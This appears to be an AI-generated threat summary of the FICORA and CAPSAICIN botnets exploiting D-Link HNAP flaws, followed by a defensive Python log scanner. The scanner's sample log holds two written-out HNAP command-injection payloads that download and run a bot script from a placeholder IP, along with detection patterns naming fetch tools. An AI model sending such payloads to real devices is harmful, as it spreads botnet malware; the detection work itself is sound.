| Category | Details |
|---|---|
| Threat Actors | Botnet operators using Mirai variant (FICORA) and Kaiten variant (CAPSAICIN). |
| Campaign Overview | Surge in botnet attacks exploiting long-patched D-Link router vulnerabilities. FICORA was observed against targets worldwide; CAPSAICIN was seen only in East Asia (Japan, Taiwan) and was active for just two days, Oct 21–22, 2024. |
| Target Regions | FICORA: Global; CAPSAICIN: East Asia (Japan, Taiwan). |
| Methodology | Initial access via command injection in the D-Link HNAP interface, followed by a downloader script that fetches the bot binary, built-in brute-force attacks against other hosts' credentials, and C2 communication for receiving commands. |
| Products Targeted | D-Link routers, Linux-based systems. |
| Malware Reference | FICORA (Mirai variant) and CAPSAICIN (Kaiten variant). |
| Tools Used | Downloader scripts ("multi" for FICORA, "bins.sh" for CAPSAICIN) that try wget, ftpget, curl and tftp to fetch the payload; a built-in brute-force function with hardcoded credentials. |
| Vulnerabilities Exploited | Command-injection flaws in the HNAP interface of D-Link routers (CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, CVE-2024-33112). |
| TTPs | Exploiting unpatched vulnerabilities, brute-force login attempts, killing rival botnet processes, leveraging DDoS techniques (UDP, TCP, DNS), maintaining persistence, and interaction via C2 servers. |
| Attribution | No named threat actor; the campaigns are characterized only by their reuse of decade-old D-Link vulnerabilities that remain unpatched on exposed devices. |
| Recommendations | Regularly update router firmware and kernels, patch known vulnerabilities, use comprehensive monitoring, and implement strict access controls. |
| Source | The Hacker News |
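The "comprehensive monitoring" recommendation above is only useful if you know what to look for. Every CVE in the table is a command injection through the HNAP SOAPAction header, and the Methodology row says the injected command is a downloader that fetches the bot with wget, ftpget, curl or tftp. The following Python detector, an added example that is not part of the article or of any vendor tooling, scans web-server access logs for exactly that shape. It assumes a combined log format with the request's SOAPAction header value appended as one extra quoted field (most servers do not log that header by default; the log lines and IP addresses below are constructed for the example, using documentation address ranges).

```python
import re
from collections import Counter
from dataclasses import dataclass

# Combined log format with the SOAPAction header value appended as a final
# quoted field. Assumption: the operator has added that field to the log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<soapaction>[^"]*)"$'
)

# Shell metacharacters that never belong in an HNAP action name; these are the
# injection markers seen in the HNAP command-injection CVEs.
SHELL_META_RE = re.compile(r'[`;|&$]')
# Download tools named in the reporting as the payload-fetch step.
FETCH_TOOL_RE = re.compile(r'\b(wget|curl|tftp|ftpget)\b', re.IGNORECASE)
# Downloader script names named in the reporting.
SCRIPT_RE = re.compile(r'\b(bins\.sh|multi)\b')

# Constructed sample log: one legitimate HNAP call, two injection attempts
# from the same source, and one unrelated request.
SAMPLE_LOG = """\
192.0.2.10 - - [21/Oct/2024:03:10:00 +0000] "POST /HNAP1/ HTTP/1.1" 200 1024 "-" "Mozilla/5.0" "http://purenetworks.com/HNAP1/GetDeviceSettings"
203.0.113.7 - - [21/Oct/2024:03:14:07 +0000] "POST /HNAP1/ HTTP/1.1" 200 512 "-" "Mozilla/5.0" "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd /tmp; wget http://198.51.100.9/bins.sh; sh bins.sh`"
203.0.113.7 - - [21/Oct/2024:03:14:09 +0000] "POST /HNAP1/ HTTP/1.1" 500 0 "-" "Mozilla/5.0" "http://purenetworks.com/HNAP1/Login/$(tftp -g -r multi 198.51.100.9)"
198.51.100.23 - - [21/Oct/2024:03:15:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0" "-"
"""


@dataclass
class Finding:
    ip: str
    ts: str
    path: str
    reasons: list[str]


def analyze_line(line: str):
    """Return a Finding for a suspicious HNAP request, or None."""
    m = LOG_RE.match(line)
    if not m or "/hnap1" not in m.group("path").lower():
        return None
    soap = m.group("soapaction")
    reasons = []
    if SHELL_META_RE.search(soap):
        reasons.append("shell metacharacters in SOAPAction")
    if FETCH_TOOL_RE.search(soap):
        reasons.append("download tool named in SOAPAction")
    if SCRIPT_RE.search(soap):
        reasons.append("known downloader script name in SOAPAction")
    if not reasons:
        return None
    return Finding(m.group("ip"), m.group("ts"), m.group("path"), reasons)


def scan(log_text: str) -> list[Finding]:
    """Run analyze_line over every line and keep the hits."""
    return [f for f in map(analyze_line, log_text.splitlines()) if f]


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count suspicious HNAP requests per source address."""
    return dict(Counter(f.ip for f in findings))


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for f in hits:
        print(f"{f.ts} {f.ip} {f.path}: {', '.join(f.reasons)}")
    print("per-source counts:", summarize(hits))
```

The check is deliberately narrow: it fires only on requests that reach the HNAP endpoint and carry injection markers or the named fetch tools in the action name, so a legitimate GetDeviceSettings call from the LAN stays quiet. Pair it with an egress rule that blocks the router from initiating tftp or ftp connections to the internet, which breaks the downloader step even when the injection succeeds.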
Read full article: https://thehackernews.com/2024/12/ficora-and-kaiten-botnets-exploit-old-d.html
The above summary has been generated by an AI language model